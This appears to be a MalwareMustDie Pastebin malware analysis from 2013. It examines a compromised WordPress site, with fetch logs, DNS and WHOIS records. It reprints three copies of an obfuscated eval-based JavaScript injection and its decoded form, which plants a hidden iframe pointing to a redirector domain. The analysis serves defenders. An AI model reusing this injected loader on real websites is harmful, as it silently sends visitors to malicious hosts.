API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie - Warning on: oklahomanews-online.com

MalwareMustDie
Mar 1st, 2013
1,387
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 13.96 KB | None | 0 0
raw download clone embed print report
  1. #MalwareMustDie! @unixfreaxjp /malware]$ date
  2. Sat Mar  2 01:52:32 JST 2013
  3.  
  4. // Just beware of: oklahomanews-online.com / 75.126.35.116
  5.  
  6. oklahomanews-online.com  A  75.126.35.116
  7. oklahomanews-online.com  NS     ns1.kidzcartoonfun.com
  8. oklahomanews-online.com  NS     ns2.kidzcartoonfun.com
  9. www.oklahomanews-online.com  CNAME  oklahomanews-online.com
  10. ↑Not a good site at all...
  11.  
  12. --2013-03-02 01:38:13--  http://mygenesreconnected.com/tag/aaron-kampman-jersey
  13. Resolving mygenesreconnected.com... seconds 0.00, 184.22.209.166
  14. Caching mygenesreconnected.com => 184.22.209.166
  15.  
  16. GET /tag/aaron-kampman-jersey HTTP/1.0
  17. Host: mygenesreconnected.com
  18. HTTP request sent, awaiting response...
  19.   :
  20. HTTP/1.0 301 Moved Permanently
  21. Date: Fri, 01 Mar 2013 16:37:56 GMT
  22. Server: Apache/2.2.22 (CentOS)
  23. X-Powered-By: PHP/5.2.17
  24. X-Pingback: http://www.mygenesreconnected.com/xmlrpc.php
  25. Location: http://www.mygenesreconnected.com/tag/aaron-kampman-jersey/
  26. Content-Length: 0
  27. Connection: close
  28. Content-Type: text/html; charset=UTF-8
  29.   :
  30. 301 Moved Permanently
  31. Location: http://www.mygenesreconnected.com/tag/aaron-kampman-jersey/ [following]
  32.   :
  33. --2013-03-02 01:38:13--  http://www.mygenesreconnected.com/tag/aaron-kampman-jersey/
  34. Resolving www.mygenesreconnected.com... seconds 0.00, 184.22.209.166
  35. Caching www.mygenesreconnected.com => 184.22.209.166
  36. Connecting to www.mygenesreconnected.com|184.22.209.166|:80... seconds 0.00, connected.
  37.   :
  38. GET /tag/aaron-kampman-jersey/ HTTP/1.0
  39. Referer: http://google.com
  40. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
  41. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  42. Host: www.mygenesreconnected.com
  43. Connection: keep-alive
  44. Keep-Alive: 300
  45. Accept-Language: en-us,en;q=0.5
  46. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  47. HTTP request sent, awaiting response...
  48.   :
  49. HTTP/1.0 200 OK
  50. Date: Fri, 01 Mar 2013 16:37:57 GMT
  51. Server: Apache/2.2.22 (CentOS)
  52. X-Powered-By: PHP/5.2.17
  53. X-Pingback: http://www.mygenesreconnected.com/xmlrpc.php
  54. Connection: close
  55. Content-Type: text/html; charset=UTF-8
  56.   :
  57. 200 OK
  58. Length: unspecified [text/html]
  59. Saving to: `index.html'
  60. 2013-03-02 01:38:15 (73.0 KB/s) - `index.html' saved [30641]
  61.  
  62.  
  63. //found three redirectors in index.html..:
  64.  
  65. <p> <script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-630!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script></p>
  66. <p> <script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-630!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script></p>
  67. <p> <script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-630!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script></p>
  68.  
  69. //------------------------------
  70.  
  71. //Evals
  72.  
  73.     if (document.getElementsByTagName('body')[0]){
  74.       iframer();
  75.     }
  76.     else {
  77.       document.write("
  78.     <iframe src='http://googleclick.info/?travel' width='100' height='100' style='width:100px;
  79.     height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
  80.     }
  81.     function iframer(){
  82.       var f = document.createElement('iframe');
  83.       f.setAttribute('src', 'http://googleclick.info/?travel');
  84.       f.style.left = '-10000px';
  85.       f.style.visibility = 'hidden';
  86.       f.style.top = '0';
  87.       f.style.position = 'absolute';
  88.       f.style.top = '0';
  89.       f.setAttribute('width', '100');
  90.       f.setAttribute('height', '100');
  91.       document.getElementsByTagName('body')[0].appendChild(f);
  92.     }
  93.  
  94. // Writes
  95.  
  96.     <iframe src='http://googleclick.info/?travel' width='100' height='100' style=
  97.     'width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>
  98.  
  99. // ↑go to TDS redirector.. who knows what they set you up...
  100.  
  101.  
  102. //who's responsible for googleclick.info?
  103.  
  104. Domain ID:D49081589-LRMS
  105. Domain Name:GOOGLECLICK.INFO
  106. Created On:01-Feb-2013 07:48:44 UTC
  107. Last Updated On:26-Feb-2013 05:48:36 UTC
  108. Expiration Date:01-Feb-2014 07:48:44 UTC
  109. Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
  110. Status:CLIENT TRANSFER PROHIBITED
  111. Status:TRANSFER PROHIBITED
  112. Registrant ID:PP-SP-001
  113. Registrant Name:Domain Admin
  114. Registrant Organization:PrivacyProtect.org
  115.   :
  116. Name Server:NS1D3.STATUSHOST.RU
  117. Name Server:NS2D3.STATUSHOST.RU
  118.  
  119. ---
  120. #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!